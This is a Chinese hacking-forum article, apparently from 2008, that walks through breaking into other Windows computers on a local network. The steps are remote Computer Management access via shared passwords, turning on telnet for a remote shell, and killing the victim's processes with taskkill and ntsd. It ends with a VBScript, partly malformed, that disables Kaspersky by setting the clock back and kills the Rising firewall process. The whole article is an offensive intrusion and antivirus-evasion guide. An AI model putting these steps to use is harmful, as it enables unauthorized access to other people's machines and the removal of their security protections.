windows局域网的一个经典的入侵方法

4年前我用的东西了,可能大家比较老了,不过也许现在还是能用上的,不过大家不妨试验一下很有趣的。
  点我的电脑右键单机管理,然后点操作底下的=》连接到另外一个计算机。输入对方ip
  或者你不知道对方ip 可以这样,点浏览高级里的立即查找,就可以显示本局域网工作组内的计算机了。然后双击你要进入的电脑,呵呵一般局域网的计算机密码是一样的,所以不需要NTLM验证,不过那个验证比较老了,现在不知道还有没有人会用,进入后然后点服务和应用,找到telnet服务,然后开启对方telnet服务,如果没有进入这些界面或者服务出错是因为对方没有开rpc服务,当然还是选择放弃吧, 如果按照刚才步骤成功,那恭喜你已经得到一个进入对方计算机的通道了。
  然后在cmd底下输入 telnet 对方ip地址 就会显示对方的一个cmdshell了,当然这里有个小技巧,如果你不知道对方ip怎么办。很简单cmd下输入net view 可以查看到局域网计算机名,然后点鼠标右键 标记你要的计算机名字选中 按下回车就复制到cmd的剪切板里了, 然后用ping命令 ping 粘贴你刚才复制的内容(直接点右键就出来了) 然后就能看到你ping的ip了。
  进入对方计算机该后该怎么做呢。 呵呵 很多黑客教程好像没有具体告诉我们下一步我们该怎么办吧 嘿嘿。
  发挥你的想象,把对方电脑就当成你本机一样去对待,比如你想查看对方进程。
  cmd 下输入 tasklist
  进程太多看不完怎么办 tasklist | more
  想杀掉他的进程怎么办?
  taskkill /f /im 进程名字 /t 如关qq taskkill /f /im qq.exe /t
  或者有的用ntsd杀进程
  ntsd -c q -p PID
  PID是用他是用tasklist就可以看到的对照相应的PID就能杀进程
  如果多次查杀对方进程不成功是什么原因,很可能对方有杀毒软件或者防火墙
  怎么去杀掉卡巴这些进程呢?
  这里有一个脚本
  Set ws = CreateObject("Wscript.Shell")
  ws.run "cmd /c set date=%date% &&date 1988-1-1 &&ping -n 30 127.0.0.1&&date %date%",vbhide
  for each ps in getobject("winmgmts:\\.\root\cimv2:win32_proCESs").instances_
  if ps.Name="rfwsrv.exe" then
  ws.run "ntsd -c q -p ps.handle",0
  我们可以这样去做 echo 加上面的每一行脚本代码>>c:\kill.vbs
  最后在运行这个脚本 就可以了。 呵呵
  也可以你觉得麻烦直接输入 date 然后加日期修改成1988年左右就行了 卡巴就失效了
  瑞星的原理也是taskkill掉了rfwsrv.exe这个进程使杀毒软件失效。
  其他的就不用我说了自己研究点dos命令就可以搞定了。




本篇文章来源于 新世纪网安基地 (www.520hack.com) 原文出处:http://www.520hack.com/Article/Text7/200811/12028.html

文章来自: 本站原创
Tags:
评论: 0 | 查看次数: 9892